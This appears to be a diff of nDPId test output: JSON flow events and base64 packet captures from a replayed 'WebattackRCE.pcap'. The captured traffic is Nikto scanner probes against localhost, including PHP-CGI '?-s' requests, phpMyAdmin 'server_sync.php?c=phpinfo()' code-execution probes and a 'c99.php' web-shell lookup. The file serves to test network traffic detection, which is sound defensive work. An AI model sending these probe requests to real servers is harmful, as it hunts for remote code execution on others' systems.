-01041{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006523)"}} +01041{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006523)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":1,"flow_last_seen":1576420277917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277917,"pkt":"AAAAAAAAAAAAAAAACABFAADBkMVAAEAGq29\/AAABfwAAAceIH5D4rqmFil0FBYAYAED+tQAAAQEICp1m\/8WdZv\/ER0VUIC9sb2dpbi5waHA\/LXMgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjUyNCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006524)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006524)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":1,"flow_last_seen":1576420277919,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277919,"pkt":"AAAAAAAAAAAAAAAACABFAADk1ppAAEAGZXd\/AAABfwAAAceKH5AeVe\/gFGxiPoAYAED+2AAAAQEICp1m\/8adZv\/GR0VUIC8zcmRwYXJ0eS9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} +01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_packet_id":1,"flow_last_seen":1576420277920,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420277920,"pkt":"AAAAAAAAAAAAAAAACABFAADbRbxAAEAG9l5\/AAABfwAAAceMH5CzBHzzJnp1p4AYAED+zwAAAQEICp1m\/8idZv\/IR0VUIC9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} +01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_packet_id":1,"flow_last_seen":1576420277922,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277922,"pkt":"AAAAAAAAAAAAAAAACABFAADkm4xAAEAGoIV\/AAABfwAAAceOH5AOOaLD4MTa7oAYAED+2AAAAQEICp1m\/8qdZv\/KR0VUIC8zcmRwYXJ0eS9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} +01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_packet_id":1,"flow_last_seen":1576420277923,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420277923,"pkt":"AAAAAAAAAAAAAAAACABFAADb3d5AAEAGXjx\/AAABfwAAAceQH5AJweSWVSMF84AYAED+zwAAAQEICp1m\/8udZv\/LR0VUIC9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} +01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_packet_id":1,"flow_last_seen":1576420277925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":1576420277925,"pkt":"AAAAAAAAAAAAAAAACABFAADU+B5AAEAGRAN\/AAABfwAAAceSH5DHT8FWYmCfAYAYAED+yAAAAQEICp1m\/82dZv\/NR0VUIC9wbWEvc2VydmVyX3N5bmMucGhwP2M9cGhwaW5mbygpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY2MDgpDQoNCg=="} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pma\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} +01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pma\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_packet_id":1,"flow_last_seen":1576420277926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277926,"pkt":"AAAAAAAAAAAAAAAACABFAAC8cdVAAEAGymR\/AAABfwAAAceUH5AbWUib+wxcy4AYAED+sAAAAQEICp1m\/86dZv\/OR0VUIC9jOTkucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY3MzkpDQoNCg=="} -01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c99.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006739)"}} +01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c99.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006739)"}} 